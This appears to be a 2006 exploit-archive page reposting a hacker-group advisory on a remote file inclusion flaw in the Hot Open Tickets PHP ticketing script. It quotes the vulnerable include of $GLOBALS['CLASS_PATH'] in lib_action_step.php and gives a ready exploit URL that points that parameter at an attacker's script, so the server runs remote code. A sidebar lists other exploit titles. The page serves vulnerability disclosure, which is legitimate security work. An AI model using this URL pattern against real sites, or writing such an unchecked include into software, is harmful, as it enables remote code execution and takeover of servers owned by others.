exploits , vulnerabilities , articles , Hot Open Tickets <= 11012004 (CLASS

2006-05-27

Hot Open Tickets <= 11012004 (CLASS_PATH) Remote Include Vuln

Rated as : Moderate Risk

################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
#   HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include
Vulnerabilities
#   Find by Kacper (Rahim).
#   Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#   Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#   Site scripts: http://hotopentickets.sourceforge.net
#
####################################################################
*/ lib_action_step.php: Line(1-4)

   include
($GLOBALS["CLASS_PATH"]."/User_list_class.php");
   function print_action_list($a)
   {

/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Expl:

http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]

#Elo ;-)
securitydot.net - 2006-05-27

Exploits - newest 10 RSS | More

2007-06-15 37773 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 19601 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23322 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 19651 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12063 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10258 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12459 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10335 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22283 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 10830 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , Hot Open Tickets <= 11012004 (CLASS_PATH) Remote Include Vuln